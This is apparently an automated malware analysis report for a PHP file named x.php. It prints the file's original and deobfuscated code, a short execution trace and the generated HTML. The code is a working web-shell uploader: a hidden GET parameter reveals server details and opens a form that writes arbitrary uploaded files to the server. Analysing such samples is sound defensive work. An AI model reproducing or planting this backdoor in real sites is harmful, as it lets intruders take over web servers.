x.php

md5: 98d64e162b4b145311289d9a7e062dc2

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original)

Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<?php

if (isset($_GET["klash"])) {
    echo "<font color=#000000>[uname]" . php_uname() . "[/uname]";
    echo "<br>";
    print "\n";
    if (@ini_get("disable_functions")) {
        echo "DisablePHP=" . @ini_get("disable_functions");
    } else {
        echo "Disable PHP = NONE";
    }
    echo "<br>";
    print "\n";
    if (@ini_get("safe_mode")) {
        echo "Safe Mode = ON";
    } else {
        echo "Safe Mode = OFF";
    }
    echo "<br>";
    print "\n";
    echo "<form method=post enctype=multipart/form-data>";
    echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
    if ($_POST["v"] == up) {
        if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
            echo "<b>Uploade Done</b>-->" . $_FILES["f"]["name"];
        } else {
            echo "<b>gagal";
        }
    }
}
echo "<!-- s7_C3ek= -->";
echo "<br>";
Execution traces
data/traces/98d64e162b4b145311289d9a7e062dc2_trace-1676259121.7245.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:32:27.622351]
1	0	1	0.000153	393464
1	3	0	0.000230	399960	{main}	1		/var/www/html/uploads/x.php	0	0
1	3	1	0.000248	399960
			0.000274	314200
TRACE END   [2023-02-13 01:32:27.622502]

Generated HTML code
<html><head></head><body><br></body></html>
Original PHP code
<?php
if (isset($_GET["klash"])) {
    echo "<font color=#000000>[uname]" . php_uname() . "[/uname]";
    echo "<br>";
    print "\n";
    if (@ini_get("disable_functions")) {
        echo "DisablePHP=" . @ini_get("disable_functions");
    } else {
        echo "Disable PHP = NONE";
    }
    echo "<br>";
    print "\n";
    if (@ini_get("safe_mode")) {
        echo "Safe Mode = ON";
    } else {
        echo "Safe Mode = OFF";
    }
    echo "<br>";
    print "\n";
    echo "<form method=post enctype=multipart/form-data>";
    echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
    if ($_POST["v"] == up) {
        if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
            echo "<b>Uploade Done</b>-->" . $_FILES["f"]["name"];
        } else {
            echo "<b>gagal";
        }
    }
}
?><?php
echo "<!-- s7_C3ek= -->";
echo "<br>";
?>

PHP Malware Analysis

x.php

md5: 98d64e162b4b145311289d9a7e062dc2

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code